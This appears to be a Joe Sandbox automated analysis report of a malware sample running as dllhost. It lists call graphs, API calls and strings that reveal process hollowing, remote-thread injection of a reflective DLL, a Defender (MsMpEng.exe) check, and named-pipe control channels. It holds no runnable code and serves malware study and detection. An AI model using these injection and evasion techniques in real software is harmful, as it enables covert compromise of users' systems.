10161->10163 10162 140001fe8 GetProcessHeap HeapFree 10163->10162 10164 140001eec 5 API calls 10163->10164 10164->10163 10166 1400020cc 2 API calls 10165->10166 10167 140002c71 10166->10167 10169 140002120 ReadFile 10168->10169 10170 140002143 10169->10170 10171 14000215d 10169->10171 10170->10169 10170->10171 10171->10115 10171->10129 10173 140002726 10172->10173 10174 14000246f 10172->10174 10173->10138 10174->10173 10175 1400020cc 2 API calls 10174->10175 10197 1400024ae 10174->10197 10175->10197 10176 1400024d7 CreateProcessW 10176->10197 10177 1400028e1 OpenProcess 10178 1400028f1 TerminateProcess 10177->10178 10177->10197 10178->10197 10179 1400020cc GetModuleHandleA GetProcAddress 10179->10197 10180 14000273f VirtualAllocEx 10183 14000276d WriteProcessMemory 10180->10183 10180->10197 10181 140002566 VirtualAllocEx 10182 140002595 WriteProcessMemory 10181->10182 10181->10197 10184 1400025b7 VirtualProtectEx 10182->10184 10182->10197 10185 14000278f VirtualProtectEx 10183->10185 10183->10197 10184->10197 10185->10197 10186 140002682 VirtualAlloc 10191 1400026a7 GetThreadContext 10186->10191 10186->10197 10187 140002858 VirtualAlloc 10189 140002879 Wow64GetThreadContext 10187->10189 10187->10197 10188 1400025f9 WriteProcessMemory 10188->10197 10192 140002891 WriteProcessMemory 10189->10192 10189->10197 10190 1400027d0 WriteProcessMemory 10190->10197 10193 1400026c4 WriteProcessMemory 10191->10193 10191->10197 10194 1400028b6 Wow64SetThreadContext 10192->10194 10192->10197 10195 1400026ef SetThreadContext 10193->10195 10193->10197 10194->10197 10196 140002712 ResumeThread 10195->10196 10195->10197 10196->10173 10196->10197 10197->10173 10197->10176 10197->10177 10197->10179 10197->10180 10197->10181 10197->10186 10197->10187 10197->10188 10197->10190 10198 14000281a VirtualProtectEx 10197->10198 10199 140002643 VirtualProtectEx 10197->10199 10198->10197 10199->10197 10201 140001f65 10200->10201 10202 140001f0b OpenProcess 10200->10202 10201->10126 10202->10201 10203 140001f23 10202->10203 10204 140002bfc 2 API calls 10203->10204 10205 140001f43 10204->10205 10206 140001f5c CloseHandle 10205->10206 10207 140001f51 CloseHandle 10205->10207 10206->10201 10207->10206 9396 2d8b0a62a2c 9398 2d8b0a62a80 9396->9398 9397 2d8b0a62a9b 9398->9397 9400 2d8b0a633c4 9398->9400 9401 2d8b0a6345a 9400->9401 9403 2d8b0a633e9 9400->9403 9401->9397 9402 2d8b0a63c40 StrCmpNIW 9402->9403 9403->9401 9403->9402 9404 2d8b0a61d14 StrCmpIW StrCmpW 9403->9404 9404->9403 9058 2d8b0a65ca9 9059 2d8b0a65cb0 VirtualProtect 9058->9059 9060 2d8b0a65cd9 GetLastError 9059->9060 9061 2d8b0a65bc0 9059->9061 9060->9061 9062 2d8b0a63ea9 9067 2d8b0a63df6 _invalid_parameter_noinfo 9062->9067 9063 2d8b0a63e60 9064 2d8b0a63e46 VirtualQuery 9064->9063 9064->9067 9065 2d8b0a63e7a VirtualAlloc 9065->9063 9066 2d8b0a63eab GetLastError 9065->9066 9066->9063 9066->9067 9067->9063 9067->9064 9067->9065 9405 2d8b0a6ca34 9406 2d8b0a6ca4d 9405->9406 9407 2d8b0a6ca49 9405->9407 9408 2d8b0a6f5e0 69 API calls 9406->9408 9409 2d8b0a6ca52 9408->9409 9420 2d8b0a6fb3c GetEnvironmentStringsW 9409->9420 9412 2d8b0a6ca5f 9415 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9412->9415 9413 2d8b0a6ca6b 9440 2d8b0a6caa8 9413->9440 9415->9407 9417 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9418 2d8b0a6ca92 9417->9418 9419 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9418->9419 9419->9407 9421 2d8b0a6ca57 9420->9421 9422 2d8b0a6fb6c 9420->9422 9421->9412 9421->9413 9423 2d8b0a6fa5c WideCharToMultiByte 9422->9423 9424 2d8b0a6fbbd 9423->9424 9425 2d8b0a6fbc4 FreeEnvironmentStringsW 9424->9425 9426 2d8b0a6d35c 12 API calls 9424->9426 9425->9421 9427 2d8b0a6fbd7 9426->9427 9428 2d8b0a6fbdf 9427->9428 9429 2d8b0a6fbe8 9427->9429 9430 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9428->9430 9431 2d8b0a6fa5c WideCharToMultiByte 9429->9431 9433 2d8b0a6fbe6 9430->9433 9432 2d8b0a6fc0b 9431->9432 9434 2d8b0a6fc0f 9432->9434 9435 2d8b0a6fc19 9432->9435 9433->9425 9436 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9434->9436 9437 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9435->9437 9438 2d8b0a6fc17 FreeEnvironmentStringsW 9436->9438 9437->9438 9438->9421 9441 2d8b0a6cacd 9440->9441 9442 2d8b0a6e01c _invalid_parameter_noinfo 11 API calls 9441->9442 9443 2d8b0a6cb03 9442->9443 9445 2d8b0a6cb7e 9443->9445 9448 2d8b0a6e01c _invalid_parameter_noinfo 11 API calls 9443->9448 9449 2d8b0a6cb6d 9443->9449 9450 2d8b0a6d038 __std_exception_copy 49 API calls 9443->9450 9453 2d8b0a6cba3 9443->9453 9456 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9443->9456 9457 2d8b0a6cb0b 9443->9457 9444 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9446 2d8b0a6ca73 9444->9446 9447 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9445->9447 9446->9417 9447->9446 9448->9443 9451 2d8b0a6cbb8 11 API calls 9449->9451 9450->9443 9452 2d8b0a6cb75 9451->9452 9454 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9452->9454 9455 2d8b0a6dee0 _invalid_parameter_noinfo 17 API calls 9453->9455 9454->9457 9458 2d8b0a6cbb6 9455->9458 9456->9443 9457->9444 9674 2d8b0a6d5b4 9675 2d8b0a6d5b9 9674->9675 9676 2d8b0a6d5ce 9674->9676 9680 2d8b0a6d5d4 9675->9680 9681 2d8b0a6d616 9680->9681 9682 2d8b0a6d61e 9680->9682 9683 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9681->9683 9684 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9682->9684 9683->9682 9685 2d8b0a6d62b 9684->9685 9686 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9685->9686 9687 2d8b0a6d638 9686->9687 9688 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9687->9688 9689 2d8b0a6d645 9688->9689 9690 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9689->9690 9691 2d8b0a6d652 9690->9691 9692 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9691->9692 9693 2d8b0a6d65f 9692->9693 9694 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9693->9694 9695 2d8b0a6d66c 9694->9695 9696 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9695->9696 9697 2d8b0a6d679 9696->9697 9698 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9697->9698 9699 2d8b0a6d689 9698->9699 9700 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9699->9700 9701 2d8b0a6d699 9700->9701 9706 2d8b0a6d484 9701->9706 9720 2d8b0a6d2ec EnterCriticalSection 9706->9720 10208 2d8b0a68332 10209 2d8b0a68d80 __std_exception_copy 49 API calls 10208->10209 10210 2d8b0a6835d 10209->10210 10211 2d8b0a75f31 __scrt_dllmain_exception_filter 9722 2d8b0a753b0 9732 2d8b0a68960 9722->9732 9724 2d8b0a753d8 9726 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9727 2d8b0a753e8 9726->9727 9728 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9727->9728 9729 2d8b0a753f1 9728->9729 9730 2d8b0a6cff8 23 API calls 9729->9730 9731 2d8b0a753fa 9730->9731 9733 2d8b0a68990 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 9732->9733 9734 2d8b0a68a91 9733->9734 9735 2d8b0a68a54 RtlUnwindEx 9733->9735 9734->9724 9734->9726 9735->9733 10212 2d8b0a75330 10213 2d8b0a75368 __GSHandlerCheckCommon 10212->10213 10214 2d8b0a75394 10213->10214 10216 2d8b0a6a4a0 10213->10216 10217 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 10216->10217 10218 2d8b0a6a4ca 10217->10218 10219 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 10218->10219 10220 2d8b0a6a4d7 10219->10220 10221 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 10220->10221 10222 2d8b0a6a4e0 10221->10222 10222->10214

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$Heap$Create$CloseValue$CurrentQuery$AllocFileFreeHandleOpenSecurityThread$DescriptorModuleProtectTokenVirtual$AdjustChangeConvertErrorExecuteFindInformationLastLibraryLocalLookupMappingNotificationPrivilegePrivilegesShellSleepStringViewlstrcmpi
                                                  • String ID: ?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$SOFTWARE$SOFTWARE\x4config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64$x4dll32$x4dll64
                                                  • API String ID: 2546391106-693630942
                                                  • Opcode ID: 38f9ebdd1b1508e50f9a6d16bde0441a7c70df72ec69f5dacc8439e791294fb3
                                                  • Instruction ID: 371269490e6c5d392aea820657ebb8e18678e187dd6748eeab6514c242163cbd
                                                  • Opcode Fuzzy Hash: 38f9ebdd1b1508e50f9a6d16bde0441a7c70df72ec69f5dacc8439e791294fb3
                                                  • Instruction Fuzzy Hash: 78C1F2B2600A4086EB26DF22F8547DA37A5F78CBD9F414116FB4A43A76DF38C589C744

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 45 140001868-1400018aa OpenProcess 46 140001cd1-140001ced 45->46 47 1400018b0-1400018c5 IsWow64Process 45->47 48 1400018d5 47->48 49 1400018c7-1400018d3 47->49 50 1400018db-1400018e7 FindCloseChangeNotification 48->50 49->50 50->46 51 1400018ed-1400018f8 50->51 51->46 52 1400018fe-140001913 51->52 53 140001925 52->53 54 140001915-14000191a 52->54 56 140001927-140001929 53->56 54->46 55 140001920-140001923 54->55 55->56 56->46 57 14000192f-140001945 OpenProcess 56->57 57->46 58 14000194b-140001964 OpenProcess 57->58 59 140001a04-140001a23 NtQueryInformationProcess 58->59 60 14000196a-140001981 K32GetModuleFileNameExW 58->60 61 140001cc8-140001ccb CloseHandle 59->61 62 140001a29-140001a2d 59->62 63 1400019b3-1400019bf CloseHandle 60->63 64 140001983-14000199e PathFindFileNameW lstrlenW 60->64 61->46 62->61 65 140001a33-140001a4b OpenProcessToken 62->65 63->59 67 1400019c1-1400019db 63->67 64->63 66 1400019a0-1400019b0 StrCpyW 64->66 65->61 68 140001a51-140001a77 GetTokenInformation 65->68 66->63 69 1400019e0-1400019f2 StrCmpIW 67->69 71 140001af4 68->71 72 140001a79-140001a82 GetLastError 68->72 69->61 70 1400019f8-140001a02 69->70 70->59 70->69 74 140001afb-140001b09 CloseHandle 71->74 72->71 73 140001a84-140001a98 LocalAlloc 72->73 73->71 75 140001a9a-140001ac0 GetTokenInformation 73->75 74->61 76 140001b0f-140001b16 74->76 77 140001ae2 75->77 78 140001ac2-140001ae0 GetSidSubAuthorityCount GetSidSubAuthority 75->78 76->61 79 140001b1c-140001b27 76->79 80 140001ae9-140001af2 LocalFree 77->80 78->80 79->61 81 140001b2d-140001b37 79->81 80->74 82 140001b52 81->82 83 140001b39-140001b43 81->83 85 140001b56-140001b8e call 1400029a4 * 3 82->85 83->61 84 140001b49-140001b50 83->84 84->85 85->61 92 140001b94-140001bb4 call 1400029a4 StrStrA 85->92 95 140001bb6-140001bc6 92->95 96 140001bcd-140001bf2 call 1400029a4 * 2 92->96 95->92 98 140001bc8 95->98 96->61 102 140001bf8-140001c21 VirtualAllocEx 96->102 98->61 102->61 103 140001c27-140001c40 WriteProcessMemory 102->103 103->61 104 140001c46-140001c68 call 140002bfc 103->104 104->61 107 140001c6a-140001c72 104->107 107->61 108 140001c74-140001c81 WaitForSingleObject 107->108 109 140001c83-140001c97 GetExitCodeThread 108->109 110 140001cbd-140001cc2 FindCloseChangeNotification 108->110 111 140001ca2-140001cbb VirtualFreeEx 109->111 112 140001c99-140001c9f 109->112 110->61 111->110 112->111
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$Close$Open$FindHandleInformationToken$AllocAuthorityChangeFileFreeLocalNameNotificationVirtual$CodeCountErrorExitLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                                  • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
                                                  • API String ID: 1047196552-2628171563
                                                  • Opcode ID: 2b16a00b8169fba4865d38f395e3f4d07e54227767ca222d3906c7a16431a916
                                                  • Instruction ID: aa2e9c602b366f086df46edbb2d603c4cad306d9795ea9e87325920370297f3c
                                                  • Opcode Fuzzy Hash: 2b16a00b8169fba4865d38f395e3f4d07e54227767ca222d3906c7a16431a916
                                                  • Instruction Fuzzy Hash: 93C14BB1700A8186EB66DF23B8907EA23A5FB89BC4F444125EF4A477A4DF38C985C744

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: HeapProcess$AllocEnum$BoundaryChangeCloseDeleteDescriptorFindFreeMemoryModulesNotificationOpenProcessesRead
                                                  • String ID:
                                                  • API String ID: 2752472822-0
                                                  • Opcode ID: ba5697e447d87321b3970d2a80d21a8dae171d7d4a90f8eea2aa6f3ee5ecc7d8
                                                  • Instruction ID: 28fb11b33fc6f94ec1b72d6715988f9935dfd05350da2d8862b8b96723d9be5a
                                                  • Opcode Fuzzy Hash: ba5697e447d87321b3970d2a80d21a8dae171d7d4a90f8eea2aa6f3ee5ecc7d8
                                                  • Instruction Fuzzy Hash: 145169B27116808AEB66DF63F8587EA26A1F78DBD4F404029EF4947764DF38C586C704

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                  • String ID:
                                                  • API String ID: 3197395349-0
                                                  • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                  • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                                                  • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                  • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleModuleProtectVirtual$ChangeCurrentFindFreeInformationLibraryMappingNotificationProcessViewlstrcmpi
                                                  • String ID: .text$C:\Windows\System32\
                                                  • API String ID: 1125510917-832442975
                                                  • Opcode ID: c686aa51e377184264062a0a3ec39641cbabcbb6b6338b4f9c9e14a722750aea
                                                  • Instruction ID: 2da0f49b8f504828cf99bd1c35657877bba6dbaefb57c64c0b3462adf03dc19e
                                                  • Opcode Fuzzy Hash: c686aa51e377184264062a0a3ec39641cbabcbb6b6338b4f9c9e14a722750aea
                                                  • Instruction Fuzzy Hash: 59517BB230468086EB62DF16F9587DA73A1FB8CBD5F444625AF4A03BA8DF38C548C704

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                  • String ID: M$\\.\pipe\x4childproc
                                                  • API String ID: 2203880229-1505516097
                                                  • Opcode ID: 9285c35094953ccea9408fe69fde103382c22ed385128524a85f62b8020e9b63
                                                  • Instruction ID: 9a433fb3c566eafd5a07951c8c56c974a3e2d06f6bef2193d4d62f97aa2207f5
                                                  • Opcode Fuzzy Hash: 9285c35094953ccea9408fe69fde103382c22ed385128524a85f62b8020e9b63
                                                  • Instruction Fuzzy Hash: FC1157F1218A4082E726DB22F8147EA6760E78DBE0F444225FB5A036F5CF7CC548CB00

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 157 140002cb0-140002cba 158 140002cbd-140002cd0 call 140002300 157->158 161 140002cd2-140002cdb Sleep 158->161 162 140002cdd-140002cea ConnectNamedPipe 158->162 161->158 163 140002d21-140002d26 Sleep 162->163 164 140002cec-140002d0d ReadFile 162->164 165 140002d2c-140002d35 DisconnectNamedPipe 163->165 164->165 166 140002d0f-140002d14 164->166 165->162 166->165 167 140002d16-140002d1f 166->167 167->165
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                  • String ID: \\.\pipe\x4control
                                                  • API String ID: 2071455217-867286819
                                                  • Opcode ID: ea5d0e36b259e0d9586660e08200355551478b737e680bb1466d0a5669cd7301
                                                  • Instruction ID: fae886f8300dcbc0ba88151123110c58f904b6dff6578ae57d5354566521a009
                                                  • Opcode Fuzzy Hash: ea5d0e36b259e0d9586660e08200355551478b737e680bb1466d0a5669cd7301
                                                  • Instruction Fuzzy Hash: 6F011AB1214A0482FB16EB23F8547E9A360A79DBE1F154225FB67436F5DF78C888C704

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 177 140003634-140003688 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 178 14000368a-14000369d K32EnumProcesses 177->178 179 1400036e7-1400036f0 SleepEx 178->179 180 14000369f-1400036ae 178->180 179->178 181 1400036d8-1400036e3 180->181 182 1400036b0-1400036b4 180->182 181->179 183 1400036b6 182->183 184 1400036c7-1400036ca call 140003190 182->184 185 1400036ba-1400036bf 183->185 188 1400036ce 184->188 186 1400036c1-1400036c5 185->186 187 1400036d2-1400036d6 185->187 186->184 186->185 187->181 187->182 188->187
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                  • String ID:
                                                  • API String ID: 3676546796-0
                                                  • Opcode ID: 81151b99d530d65dfa122e6c8ce9ef601985b82c456e08e1a9a7be0ad97868de
                                                  • Instruction ID: a1b66254d96c7cf11d413aba10b9c6aee428658a90ca8d6027ab0afa1d9e2250
                                                  • Opcode Fuzzy Hash: 81151b99d530d65dfa122e6c8ce9ef601985b82c456e08e1a9a7be0ad97868de
                                                  • Instruction Fuzzy Hash: 2C1160B270065196E716DB17F81475A7AA6F789BC1F558128EF4207B78CF3AD884CB40

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$Heap$Alloc$CloseEnumOpen$BoundaryChangeDeleteDescriptorFindFreeHandleMemoryModulesNotificationProcessesReadTerminate
                                                  • String ID:
                                                  • API String ID: 527578242-0
                                                  • Opcode ID: 9ff41f5b47486c21fa891594cf0c33ae277b6b992257bec1fa520ef4309fdbd8
                                                  • Instruction ID: c66517cf2b2c161b5e7adf19ff96308ebd974c614c1f63983815515aa541087b
                                                  • Opcode Fuzzy Hash: 9ff41f5b47486c21fa891594cf0c33ae277b6b992257bec1fa520ef4309fdbd8
                                                  • Instruction Fuzzy Hash: DD114CB1B0564086FB16DF27B84439A66A1EB8DBD4F488028FF0903777EE39C486C704

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 201 2d8b0a70298-2d8b0a702b3 202 2d8b0a702b6-2d8b0a702df 201->202 203 2d8b0a702eb-2d8b0a702f4 202->203 204 2d8b0a702e1-2d8b0a702e6 202->204 205 2d8b0a7030c 203->205 206 2d8b0a702f6-2d8b0a702f9 203->206 207 2d8b0a70376-2d8b0a7037f 204->207 210 2d8b0a70311-2d8b0a70322 GetStdHandle 205->210 208 2d8b0a702fb-2d8b0a70303 206->208 209 2d8b0a70305-2d8b0a7030a 206->209 207->202 211 2d8b0a70385-2d8b0a7039f 207->211 208->210 209->210 212 2d8b0a70324-2d8b0a7032f GetFileType 210->212 213 2d8b0a70351-2d8b0a70369 210->213 212->213 214 2d8b0a70331-2d8b0a7033c 212->214 213->207 215 2d8b0a7036b-2d8b0a7036f 213->215 216 2d8b0a7033e-2d8b0a70343 214->216 217 2d8b0a70345-2d8b0a70348 214->217 215->207 216->207 217->207 218 2d8b0a7034a-2d8b0a7034f 217->218 218->207
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileHandleType
                                                  • String ID:
                                                  • API String ID: 3000768030-0
                                                  • Opcode ID: 811060969647181ced749636d8b8bf78eb19eccd6bc36af3b806d99217aba173
                                                  • Instruction ID: 824c66b26221388c48c8edefce3cf063150c65e3ed0502a4edd9862ed0d00576
                                                  • Opcode Fuzzy Hash: 811060969647181ced749636d8b8bf78eb19eccd6bc36af3b806d99217aba173
                                                  • Instruction Fuzzy Hash: FE31C822610F44C2D7608B15959866D6F50F346BB8F78AB0BDB6AAB3E2CF34DC61D340

                                                  Control-flow Graph

                                                  APIs
                                                  • RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,?,?,?,?,000002D8B0A663FA), ref: 000002D8B0A6E0AA
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,000002D8B0A663FA), ref: 000002D8B0A6E0B4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: BoundaryDeleteDescriptorErrorLast
                                                  • String ID:
                                                  • API String ID: 2050971199-0
                                                  • Opcode ID: bf52047b548aba3e9121a186b7e69be08c1bc1befa933fe462d6a52cac7e405e
                                                  • Instruction ID: 48e6a63bb53c8c004b195271bea11bbfcf0dfc2e9686d945d4c57bca48dc8b63
                                                  • Opcode Fuzzy Hash: bf52047b548aba3e9121a186b7e69be08c1bc1befa933fe462d6a52cac7e405e
                                                  • Instruction Fuzzy Hash: 5CE01251F0160042FF18B7F2A85D32911A17B96B49F74BC27D907C2293EE644C955200
                                                  APIs
                                                  Memory Dump Source
